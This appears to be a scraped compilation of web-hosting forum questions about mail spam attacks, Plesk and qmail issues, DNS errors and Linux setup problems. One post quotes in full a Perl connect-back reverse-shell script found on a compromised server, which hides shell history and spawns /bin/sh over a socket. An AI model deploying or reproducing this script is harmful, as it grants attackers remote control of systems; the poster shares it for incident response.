Currently Under SPAM Attack "vpopmail User Not Found"
Nov 3, 2009
I'm running a dedicated server with CentOS 5
Today I opened my email logs and I was surprised by what I found!
Logs like this:
Nov 3 17:23:55 warhead vpopmail[5979]: vchkpw-smtp: vpopmail user not found sys@:118.167.19.58
Nov 3 17:23:58 warhead vpopmail[6010]: vchkpw-smtp: vpopmail user not found sys@:118.167.19.58 ...
Jan 30, 2015
I'm running a brand new installed VPS with CentOS 6.6 and Plesk 12.0.18. I created a subscription and by default an FTP user is created. However, I cannot log in with these credentials. I also created a new user but the same problem persists. I'm 100% sure that the username and password are correct.
Filezilla gives me a 530 Login incorrect. But if I look at the /var/log/secure file, I see this odd message (FTP username = test):
Jan 30 16:01:45 transip proftpd: PAM unable to dlopen(/lib64/security/pam_stack.so): /lib64/security/pam_stack.so: cannot open shared object file: No such file or directory
Jan 30 16:01:45 transip proftpd: PAM adding faulty module: /lib64/security/pam_stack.so
Jan 30 16:01:45 transip proftpd: pam_listfile(proftpd:auth): Couldn't open /etc/ftpusers
Jan 30 16:01:45 transip proftpd[18085]: 127.0.0.1 (x.x.x.x[x.x.x.x]) - USER test (Login failed): No such user found
No such user found, although it is created with Plesk.
Sep 14, 2007
RHEL3/Cpanel/Exim
So one of my domains is getting a dictionary attack. It is a popular domain and "big deal" it happens all the time. Well, this time it is the most ruthless distributed dictionary attack I have ever seen.
Today marks the one week period and emails are flooding in 10 to 15 a second (of course none of them ever get delivered). It is like hail pounding on a thin tin roof and the denial/logging alone has the server load at least quadrupled!
Oh yeah, the best part. I have a beautiful list of over 7,000 banned IP addresses (and growing every minute, now THAT'S DISTRIBUTED!).
May 16, 2007
We've been seeing sluggish performance on our mail gateways, and so I started doing some digging in the logs. It looks like we are filling up with messages like:
2007-05-16 12:22:16 Connection from [xx.xx.xx.xx] refused: too many connections
We have our max connections set to 20 (total, not host-specific) in exim4. So I started tailing the logs, and sure enough, we are getting bombarded with requests to randomstring@ourdomain.com coming from all over the map. The requests are getting denied of course, but that doesn't help the connection issue since they are consuming all of them, preventing real mail (for the most part) from getting through.
What is the proper way to deal with something like this? I could certainly just up the max connections value from 20 to 40 or 50 or whatever, but I'm not sure what kind of performance impact that will have on the rest of the traffic going through our gateways.
Since the spam attempts are coming from all over the place, it doesn't seem like I can just firewall out a few addresses and be done with it.
This particular rack is a cluster of web and database servers behind two gateway boxes, which handle the mail traffic (so this problem is on the gateways, the actual mail server itself sits behind the gateways and never actually sees these fake emails).
May 28, 2014
I'm getting a big problem on my server.
From 1 week until now I got 4 spam attacks. The attacker is the same, because the emails sent are equal.
The technique is also the same: they use an email account (compromised password) and send emails through the SMTP server.
When I detect the attack, I do:
1. Identify the compromised account
2. Change password from the compromised account
3. Stop qmail
4. Clear queue with qmail-remove
5. Start qmail
The problem is that they already used 4 different domains since the first attack. So, here is my problem: how do they discover the passwords?! How can I solve this problem? I have hundreds of email accounts and can't change them all.
CentOS release 5.10 (Final)
Plesk 11.0.9
May 22, 2014
I need to reinstall qmail after a spam attack and am following the post. URL.... It says:
rpm -Uvh --force psa-qmail
but my system returns an error message: error: opening psa-qmail failed: the file or directory does not exist (error: la apertura de psa-qmail falló: No existe el fichero o el directorio)
rpm -q psa-qmail
returns
psa-qmail-1.03-cos5.build1013120126.11
And my system is CentOS
Apr 24, 2009
We would like to create mail accounts through PHP scripts on the mywebsite.com website, so we request that you set up Qmail with the Vpopmail server on our server. We have the following packages already installed:
1. Qmail
2. Courier POP/IMAP
3. Horde Webmail client
Please install vpopmail on our server and configure these four packages to create the mail accounts via PHP script, so that we can use the vadduser command in PHP to create the mail IDs and also imap_open commands to access the mails.
Our server is configured with the Plesk control panel.
The installation is very urgent, as our website is going live soon.
I will make the decision soon; let us know the cost, as it will be given to the provider soon.
Feb 1, 2008
Not by choice but I got a machine running qmail with vpopmail on it. The queue on this thing is ridiculously long and doesn't seem to be getting any smaller due to the large amounts of spam sent to several domains under it.
Most of the spam is coming in the form of a@domain.com, aa@domain.com, etc. So I figured rather than bounce the mail back to these non-existent addresses, I'd rather go the route of /dev/null. Now for qmail you'd just do # but it seems for vpopmail that does not work.
So my .qmail-default currently has the following:
/usr/local/vpopmail/bin/vdelivermail '' /dev/null
Unfortunately it still sends mail back to the user who sent the mail but it sends it was delivered to /dev/null.
So any suggestions on how to get that working and ways to manage this queue a heck of a lot better?
Apr 24, 2009
We would like to create mail accounts through PHP scripts on the mywebsite.com website, so we request that you set up Qmail with the Vpopmail server on our server. We have the following packages already installed:
1. Qmail
2. Courier POP/IMAP
3. Horde Webmail client
Providers who install vpopmail on our server and configure these four packages to create the mail accounts via PHP script. So that we can use the vadduser command in PHP to create the mail IDs and also imap_open commands to access the mails.
We will take the decision soon since we need to take the website live shortly.
Our server is configured with the Plesk control panel.
Mar 14, 2008
We have seen an interesting system from one of our competitors:
Any user that has an email account receives, every 24 hours, an email report of all spam received (as an HTML attachment).
In this HTML file there is a list with flags; the user can indicate that a message is NOT spam and click submit in the HTML file, which sends the information to the mail server.
It may be an interesting system.
We use exim on our servers and Horde as webmail.
May 28, 2009
I have a VPS but there are too many processes called mailnull.
After that the data centre closed my server for sending spam.
So how can I catch the user sending spam with mailnull?
Jun 20, 2014
I am facing a serious problem with my qmail and Plesk 11.0.9. I found the way the spammer did it with my server by listening to everything on port 25. Maybe he knows my RCPT hosts, and they send emails with a random username but with a domain hosted on my Plesk (user1@mydomain.com, user2@ my domain.com, ... userxxx@mydomain.com).
qmail only checks the domain in RCPT if the spammer inputs: "mail from user1@mydomain.com" (without ":") - no email address on my server. Then the server replies: 550, no mailbox here by that name. (#5.7.17)
But qmail checks username and domain if the spammer inputs: "mail from: user1@mydomain.com" (with ":") - no email address on my server. Then the server replies: 250 OK. This is really weird! I tried with all my Plesk servers; this bug still affected them.
May 7, 2007
I thought I knew enough about my .htaccess stuff to do this, but I can't seem to work it out. What I want to do is if a user visits domain.com/folder, we check to see if the folder exists. If so, show as normal (IE domain.com/support)
If a user visits domain.com/dynamicusername (dynamicusername is not a physical folder), redirect to dynamicusername.domain.com
Oct 17, 2013
Microsoft Windows Server 2008 R2 Service Pack 1
Panel version 11.0.9 Update #59, last updated at Oct 3, 2013 02:06 AM
MailEnable version 5
I see in the Plesk documentation that on the screen to enable SPAM filtering for an individual there is an option to "Move spam to the Spam folder". I don't see that option so I am wondering if it is only available on some versions of Plesk, or in combination with certain mail servers. How to make that option available?
Jan 3, 2014
When I find the subscription from the admin side of PPA, if I select "Login as user" I've noticed that it is different from actually logging in as the user - for example - "add domain alias" is missing when I log in as a customer - but not as an admin... I need my customers to add their own aliases and manage them - how do I add that feature to the client login side?
Apr 4, 2007
Found a suspicious script running on a server in /dev/shm
Code:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
print "Connect Back (S) 2007
";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port]
";
die "Ex: $0 127.0.0.1 2121
";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host
";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host
";
print "[*] Connecting... $ARGV[0]
";
print "[*] Spawning Shell
";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo;id;uname -a;w");
system($system);
#EOF
Removed it, changed all passwords, etc, anyone know how this might've gotten into /dev/shm? ( CentOS 4.4 )
Jun 11, 2009
We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was delivering malicious code with an email from Google.
This website owner had tried removing the code himself and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome, were greeted with a big warning:
This site may harm your computer.
After about a week of trying to rectify the problem himself, he contacted us.
He provided us FTP access to his site so we could tackle it.
After downloading his site (which literally took 3 hours) we started scanning. We grep'd for the word "base64_decode" and found over 228 php files all with the following malscript (spaces added to protect the innocent):
Code:....
Mar 16, 2009
I have a valid SSL certificate for the website but it still shows an address not found error. But sometimes it just works fine.
Is it related to a DNS issue?
May 11, 2008
I do not know where to post this, I recently changed Hosts.
My domain through GoDaddy was changed to my new account that was setup, The issue is everyone else can see my website but me and I am not sure why?
On my end I get Server Not Found?
I can see my site through a Proxy and also I have shown the site to a few people and they have no issues accessing it...
Dec 1, 2008
For the first time after running a server for about a year I decided to buy a new server and in it I found out that there is some sort of infection in it. What should I do next? The logs are attached in an attachment.
Attached Files
rootkit.log.txt (9.4 KB, 70 views)
May 17, 2008
I can't visit my website! <snipped> Every time I go it says server not found. So I told some friends to go and they are able to see and visit <snipped> How is that possible?? They could and I can't? Yesterday same thing but then a couple of hours later it worked, I could visit hmlegends.com, but I didn't do anything and now today same thing, server not found! I cleaned my history, everything, and still server not found!
So what I did is used a proxy <snipped> and then it worked!
But then I don't use a proxy: SERVER NOT FOUND! It's like my IP can't reach hmlegends.com
I don't know how to solve this?!?? It just says server not found!
But it looks like everyone else could access it!
Anyways I'm using Firefox 2 but then maybe I thought it was my browser so switched to 3, so currently on Firefox 3
and no it's not, it's something with my IP cuz when I use a proxy I could go to my site
but point is I don't wanna use a proxy, I wanna use my IP to go to hmlegends.com
Also I'm using Dial Up Internet!
I use AOL Dialer to connect!
Aol Dialer 4.8.8.4
Apr 27, 2008
I have recently bought a VPS hosting package. At the moment I am going through the tutorials on the net that I researched before getting a VPS package to give me some understanding of what I need to do to secure the server and also how to install the software that I require.
For most of today, I have been trying to sort out a problem that I am currently having.
I am trying to sort out a part of the tutorial from a website that requires the use of apt commands.
But for every command I am getting the message back apt..... Command not found. I am currently using the Ubuntu operating system. And through some research, I have got the feeling that I might have the bare installation done on my server to just make it work.
Would I be right, and with the bare installation apt commands wouldn't be installed?
If I am, how would I go about installing the Apt commands and anything else that I might require?
Feb 22, 2008
I got a new box, and I see 'cronjob' not working,
cronjob
-bash: cronjob: command not found
I installed
yum install vixie-cron.i386
Still
cronjob
-bash: cronjob: command not found
# cron
-bash: cron: command not found
How can I get 'cronjob' working?
View 4 Replies
I upgraded from Apache 1.3.7 to the latest copy
Everything works nicely, except the cgi-bin directory
When a user tries to access a script or even a standard text file, it throws up the error..
Not Found
The requested URL /cgi-bin/first.txt was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
When they try and access the cgi-bin directory itself, they get
Forbidden
You don't have permission to access /cgi-bin/ on this server
Now, I've checked the httpd.conf file and this is what it has for Cgi-bin
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
</IfModule>
<Directory "/usr/local/apache/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
And the error logs say..
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] File does not exist: /home/goewowc/public_html/404.shtml
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] script not found or unable to stat: /usr/local/apache/cgi-bin/first.txt
The CGI-bin directory is chmodded correctly, the files are also chmodded and belong to the correct group
Nov 16, 2007
While I am installing some programs there is a problem with my PHP:
PHP GD Module Not Found
How could I install it in SSH root?